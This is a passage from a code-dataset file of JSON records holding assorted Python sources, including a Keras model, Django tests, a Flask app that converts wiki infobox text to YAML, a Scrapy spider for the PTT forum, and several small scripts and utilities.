= oechem.OEAltLocationFactory(temp_mol)\n mol.Clear()\n fact.MakePrimaryAltMol(mol)\n return (mol)\n\n\ndef main(argv=[__name__]):\n if len(argv) != 2:\n oechem.OEThrow.Usage(\"%s \" % argv[0])\n mol = oechem.OEGraphMol()\n ReadProteinFromPDB(argv[1], mol)\n RamaCheck(mol)\n\n\nif __name__ == \"__main__\":\n sys.exit(main(sys.argv))\n","sub_path":"venv/Lib/site-packages/openeye/docexamples/bio/RamaOutlierCheck.py","file_name":"RamaOutlierCheck.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"89986050","text":"cijferICOR = 6.5\ncijferPROG = 7.8\ncijferCSN = 6.9\ngemiddelde = (cijferICOR + cijferPROG + cijferCSN)/3\nbeloning = gemiddelde * 30 * 3\nimport math\ngemiddeldeG = (math.floor(gemiddelde*10)/10)\nbeloningG = round(beloning, 1)\nprint('Mijn cijfers (gemiddeld een ', gemiddeldeG, ') leveren een beloning op van ', beloningG, 'euro!')\n\n\n#Mijn cijfers (gemiddeld een 7.0 ) leveren een beloning op van 636.0 euro!","sub_path":"les4/1Getallen, Strings and Conversion.py","file_name":"1Getallen, Strings and Conversion.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"365288186","text":"import math\n\n\"\"\" count of 64s \"\"\"\nn = 0\n\"\"\" samples since last 64 \"\"\"\nfraction = 0\nticks = 0\n\"\"\" samples in beat \"\"\"\nsize64 = 1000\nsize1 = 1000\nsamplerate = 44100\nsubscribers = []\nnextBeat = False\n\ndef setSubscribers(list):\n global subscribers\n subscribers = list\n\ndef onBeat():\n pass\n\ndef updateBpm(bpm, samplerate = 44100):\n global size64\n global size1\n size1 = (samplerate / (bpm / 60)) * 4\n size64 = size1 / 64\n samplerate = samplerate\n\ndef move(frames):\n global beattime\n global n\n global samplerate\n 
global fraction\n global ticks\n global nextBeat\n global size64\n global size1\n fraction += frames\n ticks = (ticks + frames) % size1\n n = math.floor(ticks / size64)\n if fraction > size64:\n fraction = fraction % size64 \n for sub in subscribers:\n getattr(sub, 'autoplayTick')(n, fraction)\n\n\"\"\"\ndef isReady():\n global ready\n return ready\n\ndef notifyAll(midiController, samplesController):\n global fraction\n global beattime\n global ready\n global fraction\n global n\n fraction = fraction % beattime\n midiController.autoplayTick(n, fraction / beattime)\n samplesController.autoplayTick(n, fraction / beattime)\"\"\"","sub_path":"autoplayController.py","file_name":"autoplayController.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"477958048","text":"from keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Bidirectional, Embedding, Dropout, Conv1D, MaxPooling1D\nfrom src.models.base_model import Base\n\n\nclass CnnBilstm(Base):\n def __init__(self, vocab_size, max_length, embeddings_matrix):\n super().__init__()\n self.vocab_size = vocab_size\n self.max_length = max_length\n self.embeddings_matrix = embeddings_matrix\n\n def setup(self):\n model = Sequential()\n model.add(Embedding(self.vocab_size, 50, input_length=self.max_length, weights=[self.embeddings_matrix],\n trainable=False))\n model.add(Dropout(.2))\n\n model.add(Conv1D(128, 5, activation=\"relu\"))\n model.add(MaxPooling1D(pool_size=4))\n\n model.add(Bidirectional(LSTM(128)))\n model.add(Dropout(.5))\n\n model.add(Dense(66, activation=\"softmax\"))\n\n self.base = model\n","sub_path":"src/models/cnn_bilstm.py","file_name":"cnn_bilstm.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"628756821","text":"############################################################################\n# CONFIDENTIAL\n#\n# Copyright (c) 2020 Qualcomm Technologies International, Ltd.\n# %%version\n#\n############################################################################\n\nfrom csr.dev.fw.firmware_component import FirmwareComponent\nfrom csr.dev.model import interface\nfrom .structs import IAdkStructHandler\n\nclass ConnectionManager(FirmwareComponent):\n ''' This class reports the connection manager state and provides some\n Bluetooth related helper functions. 
'''\n\n    # Number of microseconds per BT slots\n    MICROSECONDS_PER_SLOT = 625\n\n    # Connection library lp_power_mode value for sniff\n    SNIFF_MODE = 1\n\n    @classmethod\n    def slots_to_ms(cls, slots):\n        ''' Convert Bluetooth slots to milliseconds '''\n        return cls.slots_to_us(slots) / 1000.0\n\n    @classmethod\n    def slots_to_us(cls, slots):\n        ''' Convert Bluetooth slots to microseconds '''\n        return (slots * cls.MICROSECONDS_PER_SLOT)\n\n    @property\n    def connections(self):\n        ''' Returns the connection manager's array of ACL connections '''\n        return self.env.cu.connection_manager_list.local.connections\n\n    @property\n    def active_connections_count(self):\n        ''' Returns the number of active connections in the connection manager '''\n        return len(list(self._active_connections_generator()))\n\n    @property\n    def active_connections_tpaddrs(self):\n        ''' Return a list of active connection tpaddrs '''\n        return [active[0] for active in self._active_connections_generator()]\n\n    def _active_connections_generator(self):\n        ''' Iterates the connection manager list yielding active connections '''\n        connections = self.connections\n        with connections.footprint_prefetched():\n            for conn in connections:\n                tpaddr = IAdkStructHandler.handler_factory(\"tp_bdaddr\")(self._core, conn.tpaddr)\n                if not tpaddr.typed_bdaddr.bdaddr.is_zero():\n                    yield (tpaddr, conn)\n\n    def _generate_report_body_elements(self):\n        ''' Report the list of connections'''\n        grp = interface.Group(\"Connections\")\n        tbl = interface.Table([\"TpBdAddr\", \"Bitfields\", \"Link Policy\", \"Details\"])\n        for (tpaddr, conn) in self._active_connections_generator():\n            lp_state = conn.lp_state.pt_index.symbolic_value\n            details = \"\"\n            if tpaddr.is_bredr():\n                if conn.mode.value == self.SNIFF_MODE:\n                    si_slots = conn.sniff_interval.value\n                    details = \"Sniff mode {} slots ({}ms)\".format(si_slots, self.slots_to_ms(si_slots))\n            elif tpaddr.is_ble():\n                details = \"Connection Interval={}, Slave Latency={}\".format(conn.conn_interval, conn.slave_latency)\n            tbl.add_row([tpaddr, conn.bitfields, lp_state, details])\n        grp.append(tbl)\n        return [grp]\n","sub_path":"adk/tools/pylib/adk/caa/connection_manager.py","file_name":"connection_manager.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152593401","text":"from django.test import TestCase\nfrom django.forms.models import model_to_dict\nfrom django.contrib.auth.hashers import check_password\nfrom nose.tools import eq_, ok_\nfrom bundles.tests.factories import BundleFactory, LinkFactory\nfrom bundles.serializers import (\n    LinkSerializer,\n    CreateLinkSerializer,\n    BundleSerializer,\n    CreateBundleSerializer\n)\n\n\nclass TestCreateLinkSerializer(TestCase):\n\n    def setUp(self):\n        self.bundle = model_to_dict(BundleFactory())\n\n    def test_create_link_serializer_with_empty_data(self):\n        serializer = CreateLinkSerializer(data={'url': '', 'title': ''})\n        eq_(serializer.is_valid(), False)\n\n    def test_create_link_serializer_with_invalid_url_with_no_protocol_specified(self):\n        \"\"\" Test that link_data with an invalid url (because there is no http(s)) \n        returns False\n        \"\"\"\n        # No http(s) specified in beginning of url\n        serializer = CreateLinkSerializer(data={'url': 'google.com', 'title': 'google'})\n        eq_(serializer.is_valid(), False)\n\n    def test_create_link_serializer_with_valid_url(self):\n        \"\"\" Test that link_data with a valid url\n        returns True\n        \"\"\"\n        serializer = 
CreateLinkSerializer(data={'url': 'https://google.com', 'title': 'google'})\n        eq_(serializer.is_valid(), True)","sub_path":"bundle-api/bundles/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390463125","text":"from django.contrib import admin\nfrom django.conf import settings\nfrom django.urls import include, path\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n    path('admin/', admin.site.urls),\n    path('', include('home.urls')),\n    path('accounts/', include('allauth.urls')),\n    path('products/', include('products.urls')),\n    path('shopping_bag/', include('shopping_bag.urls')),\n    path('reviews/', include('reviews.urls')),\n    path('checkout/', include('checkout.urls')),\n    path('user_profile/', include('user_profile.urls')),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"an_interesting_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"649773657","text":"# from .Keys import GMaps\nfrom Keys import GMaps\nimport requests\nimport pandas as pd\n\n# (1) - From front end to here\n\ndef latlongAddress(add):\n\n    bikes = pd.read_csv(\"Hubway_Stations_as_of_July_2017.csv\")\n    address = add.replace(\" \", \"+\")\n    # URL = \"https://maps.googleapis.com/maps/api/geocode/json?latlng=\"+ str(lat) + \",\" + str(long) + \"&key=\" + GMaps\n    URL = \"https://maps.googleapis.com/maps/api/geocode/json?address=\" + address + \"&key=\" + GMaps\n    r = requests.get(url = URL)\n    data = r.json()\n    print(data)\n    return [data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"], data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]]\n","sub_path":"locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"333441744","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.11-x86_64/egg/lib/parse_args.py\n# Compiled at: 2017-03-26 22:07:48\nimport argparse\nfrom sys import stdin\nfrom os.path import abspath\nfrom os.path import expanduser\n\nclass FullPaths(argparse.Action):\n    \"\"\"Expands user- and relative-paths\n    \"\"\"\n\n    def __call__(self, parser, namespace, values, option_string=None):\n        setattr(namespace, self.dest, abspath(expanduser(values)))\n\n\ndef parse_args():\n    \"\"\"Parses the command line\n\n    Return:\n    -----\n    ArgParse: An ArgsParse object with the settings for the genprimers run\n\n    \"\"\"\n    parser = argparse.ArgumentParser(description='Process some integers.')\n    subparsers = parser.add_subparsers(help='sub-commands help', dest='subparser_name')\n    indx_parser = subparsers.add_parser('index', help='create an index for a set of' + ' sequences')\n    indx_parser.add_argument('fasta', help='FASTA file with the sequences' + ' to be indexed', metavar='FASTA')\n    list_parser = subparsers.add_parser('list', help='list all available sequences ' + ' to generate primers')\n    list_parser.add_argument('list_fasta', help='FASTA file with the sequences', metavar='FASTA')\n    primers_parser = subparsers.add_parser('primers', help='create a set of primers for' + ' a subset, given a universe of' + ' sequences', 
add_help=False)\n primers_parser.add_argument('fasta_indx', help='Indexed FASTA containing all the' + ' sequences', metavar='UNIVERSE', action=FullPaths)\n primers_parser.add_argument('targets_ids', help='File containing the list of' + ' identifiers of' + ' the target sequences (default stdin)', metavar='TARGETS', nargs='?', type=argparse.FileType('r'), default=stdin)\n primers_parser.add_argument('output_prefix', help='Output prefix for the results', metavar='OUTPUT')\n thermo_args = primers_parser.add_argument_group('thermodynamic arguments')\n thermo_args.add_argument('-p', '--op-temp', dest='op_temp', help='Operation temperature in Celsius.' + ' Operation temperature is the lower' + ' temperature in the PCR cycle (default 50)', type=float, metavar='FLOAT', default=50.0)\n thermo_args.add_argument('-j', '--prim-con', dest='prim_con', help='Primer concentration in Molar' + ' (default 2e-7)', type=float, metavar='FLOAT', default=2e-07)\n thermo_args.add_argument('-n', '--na', dest='na', help='Monovalent cations concentration in Molar' + ' (default 5e-3)', type=float, metavar='FLOAT', default=0.005)\n thermo_args.add_argument('-m', '--mg', dest='mg', help='Divalent cations concentration in Molar' + ' (default 0)', type=float, metavar='FLOAT', default=0)\n thermo_args.add_argument('-d', '--sdss', dest='sdss', help='Threshold to determine SDSS region in' + ' the primers (default 0.01)', type=float, metavar='FLOAT', default=0.01)\n fil_args = primers_parser.add_argument_group('primer filtering arguments')\n fil_args.add_argument('-k', '--min-prim-size', dest='min_prim_size', help='Mimimum primer size in bp (default 18)', type=int, metavar='INT', default=18)\n fil_args.add_argument('-K', '--max-prim-size', dest='max_prim_size', help='Maximum primer size in bp (default 22)', type=int, metavar='INT', default=22)\n fil_args.add_argument('-t', '--min-melt', dest='min_melt', help='Minimum melting temperature in Celsius' + ' allowed for primers (default 60)', type=float, metavar='FLOAT', default=60.0)\n fil_args.add_argument('-T', '--max-melt', dest='max_melt', help='Maximum melting temperature in Celsius ' + ' allowed for primers (default 65)', type=float, metavar='FLOAT', default=65.0)\n fil_args.add_argument('-s', '--dgss', dest='dgss', help='Primers with a minimum energy (dG) in' + ' in kcal/mol for hairpin formation below this' + ' value will be discarded (default -1.5)', type=float, metavar='FLOAT', default=-1.5)\n fil_args.add_argument('-x', '--dghm', dest='dghm', help='Primers with a minimum energy (dG) in' + ' kcal/mol for homodimer formation (dG) below' + ' this value will be discarded (default' + ' -8.5)', type=float, metavar='FLOAT', default=-8.5)\n fil_args.add_argument('-g', '--min-gc', dest='min_gc', help='Minimum GC percentage for primers' + ' (default 30)', type=float, metavar='FLOAT', default=30.0)\n fil_args.add_argument('-G', '--max-gc', dest='max_gc', help='Maximum GC percentage for primers' + ' (default 70)', type=float, metavar='FLOAT', default=70.0)\n fil_args.add_argument('-l', '--lcc', dest='lcc', help='Minimum local compisition complexity' + ' for the primer (default 1.0)', type=float, metavar='FLOAT', default=1.0)\n fil_args.add_argument('-e', '--edit-distance', dest='edit_distance', help='Maximum number of mismatches between ' + ' the primer and the target sequences (default 3)', type=int, metavar='INT', choices=[\n 0, 1, 2, 3], default=3)\n prim_args = primers_parser.add_argument_group('primers pairs arguments')\n prim_args.add_argument('-a', '--min-amp-size', 
dest='min_amp_size', help='Mimimum amplicon size in bp for a' + ' given set of primers (default 100)', type=int, metavar='INT', default=100)\n prim_args.add_argument('-A', '--max-amp-size', dest='max_amp_size', help='Maximum amplicon size in bp for a' + ' given set of primers (default 300)', type=int, metavar='INT', default=300)\n prim_args.add_argument('-F', '--tragets-fraction', dest='target_frac', help='Minimum fraction of target sequences' + ' a primer must to detect in order to be' + ' considered (default 0.9)', type=float, metavar='FLOAT', default=0.9)\n prim_args.add_argument('-X', '--ppdghm', dest='ppdghm', help='Primers pairs with a minimum energy (dG) in' + ' kcal/mol for heterodimer formation below this' + ' value will be descarded (default -8.5)', type=float, metavar='FLOAT', default=-8.5)\n out_args = primers_parser.add_argument_group('output arguments')\n out_args.add_argument('-P', '--prefix', help='Prefix to be added to the primers' + ' identifiers (default PB)', dest='primers_prefix', default='PB', metavar='STRING')\n out_args.add_argument('-r', '--records', help='Report up to this number of primer pairs' + ' (default 10)', dest='records', type=int, default=10, metavar='INT')\n misc_args = primers_parser.add_argument_group('miscellaneous arguments')\n misc_args.add_argument('-h', '--help', action='help', help='Show this help message and exit')\n misc_args.add_argument('-v', '--verbose', help='Control the verbose level (default 1)', dest='verb_level', default='1', choices=[\n 0, 1, 2])\n args = parser.parse_args()\n return args","sub_path":"pycfiles/genprimers-0.0.1-py2.7/parse_args.py","file_name":"parse_args.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"314818883","text":"start_value = int(input(\"Enter start value> \"))\nend_value = int(input(\"Enter finish value> \"))\nstart = start_value\nend = end_value\ncounter = 0\nif end_value < start_value:\n start = end_value\n end = start_value\nprint(\"а. 
Все числа диапазона\")\nfor i in range(start, end + 1, 1):\n print(i)\nprint(\"b.Все числа в убывающем порядке\")\nfor i in range(end, start - 1, -1):\n print(i)\nprint(\"c.Все числа кратные '7' \")\nfor i in range(start, end + 1, 1):\n if i % 5 == 0:\n counter = counter + 1\n if i % 7 == 0:\n print(i)\nprint(f\"d.Количество чисел кратных '5' равно: {counter}\")","sub_path":"Python_Homework/Python_HW2/HW5.py","file_name":"HW5.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313512586","text":"import time\nfrom multiprocessing import Process, Lock\n\n\ndef l(lock, num):\n lock.acquire()\n print(\"Hello Num: %s\" % (num))\n time.sleep(1)\n lock.release()\n\n\nif __name__ == '__main__':\n lock = Lock() # 这个一定要定义为全局\n for num in range(20):\n Process(target=l, args=(lock, num)).start() # 这个类似多线程中的threading,但是进程太多了,控制不了。\n","sub_path":"thread_process/pool_lock_demo.py","file_name":"pool_lock_demo.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"305005177","text":"from flask import Flask, render_template, request, send_file\nfrom urllib.request import urlopen, Request\nimport json\nimport csv\nimport os.path\nimport os\nimport re\nimport yaml\n\ndef create_app(enviroment):\n app = Flask(__name__)\n app.config.from_object(enviroment)\n\n return app\n\n#Funcion que convierte los datos en cadena de textos separadas en espacios\n# Function to convert \ndef listToString(s): \n # initialize an empty string\n str1 = \"\" \n # traverse in the string \n for ele in s: \n str1 += ele+\" \" \n return str1\n\n#Funcion que convierte los datos en cadena de textos separadas en |\n# Function to convert \ndef listToString2(s): \n # initialize an empty string\n str1 = \"\" \n # traverse in the string \n for ele in s: \n str1 += ele+\"|\" \n return str1\n\n\n#/--------------------ARREGLOS AUXILIARES--------------------/\n#Arreglo donde guardara los datos extraidos de la cadena content\ndata = []\n#Arreglo donde guardara los encabezados del archivo csv\nheader = ['image', 'caption', 'keywords', 'uses', 'instance-of', 'date-completed', 'date-published', 'date-updated', 'sdg']\n#Arreglo donde guardara los nombres de las imagenes\nimages = []\n#Arreglo donde guardara las caption de las imagenes\ncaptions = []\n#Arreglo donde guardara los keywords\nkeyAllArray = []\n#Arreglo donde guardara las fechas de actualizaciones\nupdates = []\n\napp = Flask(__name__, template_folder=\"templates\")\n\n\n@app.route(\"/\", methods = [\"POST\", \"GET\"])\ndef home():\n if request.method == \"POST\":\n param = request.form [\"param\"]\n escape = \" \"\n articulo = param.replace(escape, '%20')\n newarticulo = articulo.strip('%20')\n url = 'https://www.appropedia.org/w/api.php?action=query&prop=revisions&titles='+newarticulo+'&rvslots=*&rvprop=content&format=json'\n accessreq = Request(url, headers = {\"User-Agent\": \"Mozilla/5.0\"})\n leer = urlopen(accessreq)\n formatojson = json.loads(leer.read())\n milista = []\n for clave in formatojson.items():\n milista.append(clave)\n readytogo = \"\".join(str(milista))\n \n #mis regex\n #image and caption\n file = re.compile('\\[File:.*?\\]') \n #keywords\n keywords = re.compile('(?<=\\|keywords =)([^|]+)(?=\\|)')\n #uses\n uses = re.compile('(?<=\\|uses =)([^|]+)(?=\\|)')\n #instance-of\n partoff = re.compile('(?<=\\|part-of =)([^}]+)(?=\\})')\n #date-completed\n completed = 
re.compile('(?<=\\|completed =)([^}]+)(?=\\})')\n #date-published\n published = re.compile('(?<=\\|published =)([^|]+)(?=\\|)')\n #date-updated\n update = re.compile('(?<=\\=Update)([^=]+)(?=\\=)')\n #sdg\n sdg = re.compile('(?<=\\|sdg =)([^|]+)(?=\\|)')\n\n #/--------------------EXTRACCION DE LA CADENA--------------------/\n #Variable que extrae el match o lo que acierta del regex file\n files = re.findall(file, readytogo)\n #Variable que extrae el match o lo que acierta del regex keywords\n keywordsAll = re.findall(keywords, readytogo)\n #Variable que extrae el match o lo que acierta del regex sdg\n SDGs = re.findall(sdg, readytogo)\n #Variable que extrae el match o lo que acierta del regex published\n datePublished = re.findall(published, readytogo)\n #Variable que extrae el match o lo que acierta del regex uses\n usesAll = re.findall(uses, readytogo)\n #Variable que extrae el match o lo que acierta del regex completed\n dateCompleted = re.findall(completed, readytogo)\n #Variable que extrae el match o lo que acierta del regex partof\n partedof = re.findall(partoff, readytogo)\n #Variable que extrae el match o lo que acierta del regex partof\n dateupdated = re.findall(update, readytogo)\n\n #/--------------------IMPRESION DE LA CADENA--------------------/\n #Imprimimos lo que se obtuvo en la variable files\n for a in files:\n string = str(a)[6:-1]\n b = string.split('|')\n b1 = b[0]\n images.append(b1)\t\n #Imprimimos lo que se obtuvo en la variable files\n for k in files:\n string = str(a)[6:-1]\n l = string.split('|')\n l1 = b[2]\n l2 = str(l1)[7:]\n captions.append(l2)\n #Imprimimos lo que se obtuvo en la variable keywordsAll\n for c in keywordsAll:\n string = str(c)[1:-1]\n d = string.split(', ')\n for element in d:\n keyAllArray.append(element)\n #Imprimimos lo que se obtuvo en la variable usesAll\n for g in usesAll:\n string = str(g)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable partedof\n for i in partedof:\n string = str(i)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable dateCompleted\n for h in dateCompleted:\n string = str(h)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable datePublished\n for f in datePublished:\n string = str(f)[1:-1]\n data.append(string.rstrip())\n #Imprimimos lo que se obtuvo en la variable updated\t\n for j in dateupdated:\n string = str(j)[1:]\n k = string.split('\\n')\n updates.append(k[0])\n #Imprimimos lo que se obtuvo en la variable SDGs\n for e in SDGs:\n string = str(e)[1:-1]\n data.append(string.rstrip())\n\n #/--------------------CONVERSION DE LISTAS EN CADENAS DE TEXTOS--------------------/\n #Variable donde guardara la conversion del arreglo images\n imagestr = listToString2(images)\n #Variable donde guardara la conversion del arreglo captions\n captionstr = listToString2(captions)\n #Variable donde guardara la conversion del arreglo keyAllArray\n keywordstr = listToString2(keyAllArray)\n #Variable donde guardara la conversion del arreglo updates\n updatestr = listToString2(updates)\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento image dentro del header\n data.insert(header.index('image'), str(imagestr)[:-1])\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento caption dentro del header\n data.insert(header.index('caption'), str(captionstr)[:-1])\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento keywords dentro del header\n 
data.insert(header.index('keywords'), str(keywordstr)[:-1])\n #Agregamos la cadena de texto en la posición determinada por el posicion del elemento date-updated dentro del header\n data.insert(header.index('date-updated'), str(updatestr)[:-1])\n #Variable donde guardara la conversion del arreglo header ()\n headerstr = listToString(header)\n #Variable donde guardara la conversion del NUEVO arreglo data\n datastr = listToString(data)\n #Imprimimos lo que se obtuvo en la variable headerstr\t\n #print(headerstr)\n #Imprimimos lo que se obtuvo en la variable datastr\t\n #print(datastr)\n\n dict_file = [{''+header[0]+'':images},\n {''+header[1]+'':captions},\n {''+header[2]+'':keyAllArray},\n {''+header[3]+'':data[3]},\n {''+header[4]+'':data[4]},\n {''+header[5]+'':data[5]},\n {''+header[6]+'':data[6]},\n {''+header[7]+'':updates},\n {''+header[8]+'':data[8]}\n ] \n\n #/--------------------ARCHIVO CSV--------------------/\n #with open('Infobox.csv', 'w', newline='') as file:\n # #Usamos la función se utiliza para crear un objeto de tipo writer y donde pasamo un parámetro adicional que es el delimiter=';' donde queremos usar el ; como delimitador en el archivo Infobox.csv\n # writer = csv.writer(file, delimiter=';')\n # #La función writer.writerow() se utiliza para escribir en el archivo CSV.\n # writer.writerow(header)\n # writer.writerow(data) \n #p = \"Infobox.csv\"\n\n #/--------------------ARCHIVO YAML--------------------/\n with open(r'Infobox.yaml', 'w') as file:\n documents = yaml.dump(dict_file, file)\n p = \"Infobox.yaml\"\n return send_file(p, as_attachment=True)\n else:\n return render_template(\"formulario.html\")\n\nif __name__ == \"__main__\":\n app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"568861788","text":"def exclude_first_name(name):\n names=name.split(\",\")\n result=[]\n for i in names:\n result.append(i[1:])\n return result\n\nfirst_names = exclude_first_name(\"황광희,이효리,김지훈,이지은,고수\")\nprint(first_names)\n\ndef is_pangram(sentence):\n right = \"abcdefghijklmnopqrstuvwxyz\"\n s = sentence.replace(\" \",\"\").lower()\n for i in right:\n if i not in s:\n return False\n return True\n\n# 알파벳이 모두 포함된 문자열은 True 값을 반환\nprint(is_pangram(\"abcdefghijklmnopqrstuvwxyz\"))\nprint(is_pangram(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"))\nprint(is_pangram(\"The quick brown fox jumps over the lazy dog\"))\nprint(is_pangram(\"Jock nymphs waqf drug vex blitz\"))\n# 알파벳 중 글자가 하나씩 빠진 문자열은 False 값을 반환\nprint(is_pangram(\"The quik brown fox jumps over the lazy dog\"))\nprint(is_pangram(\"The quick brown fx jumps over the lazy do\"))\nprint(is_pangram(\"ock nymphs waqf drug vex blitz\"))\nprint(is_pangram(\"Jock nymphs waqf drug vex bltz\"))\n\n\ndef num_to_list(num):\n list=[]\n zeroCnt = len(str(num))-1\n for i in (str(num)):\n list.append(int(i)*(10**zeroCnt))\n zeroCnt-=1\n return list\n\nli1 = num_to_list(54321)\nli2 = num_to_list(1004)\nprint(li1)\nprint(li2)\n# 리스트의 모든 값을 더하는 sum 함수를 반환된 리스트에 적용하면 원래 값을 반환해야 함\nprint(sum(num_to_list(54321)))\nprint(sum(num_to_list(1004)))\n\ndef print_weekday(day):\n num = day%7\n day_tuple={0:\"화요일\",1:\"수요일\",2:\"목요일\",3:\"금요일\",4:\"토요일\",5:\"일요일\",6:\"월요일\"}\n print(day_tuple[num])\n\nfor i in range(1,32):\n print_weekday(i)\n\n\ndef snakecase_to_camelcase(sentence):\n s = sentence.split(\"_\")\n camelcase=\"\"\n for i in range(1, len(s)):\n camelcase+=s[i][0].upper()+s[i][1:]\n camelcase=s[0]+camelcase\n 
return camelcase\n\ncc1 = snakecase_to_camelcase(\"hello\")\ncc2 = snakecase_to_camelcase(\"hello_world\")\ncc3 = snakecase_to_camelcase(\"snake_case_to_camel_case\")\nprint(cc1)\nprint(cc2)\nprint(cc3)","sub_path":"WS/test01.py","file_name":"test01.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"57776772","text":"#encoding: utf-8\nfrom OpenOrange import *\nfrom Report import Report\nfrom Currency import Currency\n\nclass CurrencyCheckReport(Report):\n\n def defaults(self):\n specs = self.getRecord()\n specs.gDate = today()\n\n def getRates(self,cur):\n specs = self.getRecord()\n # same as paste currency\n from ExchangeRate import ExchangeRate\n exRate = ExchangeRate.getRate(cur, specs.gDate)\n CurrencyRate = exRate.Value\n bRate = ExchangeRate.getRate(Currency.getBase2(), specs.gDate)\n BaseRate = bRate.Value\n return (CurrencyRate,BaseRate)\n\n def run(self):\n specs = self.getRecord()\n (b1,b2) = Currency.getBases()\n self.startTable()\n self.row(\"Fill in a Quote for EUR,USD,PYG\")\n self.row(\"Base 1 = %s Base 2 = %s \" % (b1,b2))\n self.endTable()\n self.startTable()\n self.header(\"Currency\",\"Amount\",b1,b2,\"EUR\")\n curs = [\"ARS\",\"USD\",\"EUR\",\"PYG\"]\n amounts = [100,100,100,1000]\n for i in range(0,4):\n cur = Currency.bring(curs[i])\n (curRate,baseRate) = self.getRates(curs[i])\n (ab1,ab2) = cur.convert(amounts[i],curRate,baseRate)\n eu = Currency.convertTo(amounts[i],curRate,baseRate,curs[i],\"EUR\",specs.gDate)\n self.row(curs[i],amounts[i],ab1,ab2,eu)\n self.endTable()\n\n","sub_path":"standard/reports/CurrencyCheckReport.py","file_name":"CurrencyCheckReport.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"303731991","text":"import re\nimport scrapy\nimport MySQLdb\nfrom ptt.items import PttPageListItem\nfrom scrapy.http import Request\n\nclass PttPageListSpider(scrapy.spiders.Spider):\n name = \"ptt\"\n allowed_domains = [\"ptt.cc\"]\n\n def __init__(self, domain='https://www.ptt.cc/bbs/Gossiping/index.html'):\n self.start_urls = [domain]\n\n def make_requests_from_url(self, url):\n request = super(PttPageListSpider, self).make_requests_from_url(url)\n request.cookies['over18'] = '1'\n return request\n\n def parse(self, response):\n sel = response.xpath('//*[@id=\"action-bar-container\"]/div/div[2]/a[2]/@href').extract()[0]\n pattern = re.compile(r'^.*index([0-9]+)\\.html$')\n total = int(pattern.match(str(sel)).group(1))\n\n for id in range(1, total+1):\n url = \"https://www.ptt.cc/bbs/Gossiping/index%s.html\" % id\n yield Request(url=url, callback=self.parse_aticlelist)\n\n def parse_aticlelist(self, response):\n urls = response.xpath('//*[@id=\"main-container\"]/div[2]/div/div[3]/a/@href').extract()\n for url in urls:\n yield Request(url='https://www.ptt.cc'+url, callback=self.parse_article)\n\n def parse_article(self, response):\n title = response.xpath('//*[@id=\"main-content\"]/div[3]/span[2]').extract()[0]\n date = response.xpath('//*[@id=\"main-content\"]/div[4]/span[2]').extract()[0]\n # to do\n\n\n\n\n ","sub_path":"ptt/spiders/ptt_spider.py","file_name":"ptt_spider.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346394914","text":"# Suppresses Scapy runtime warning\nimport logging\n\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\n\nfrom scapy 
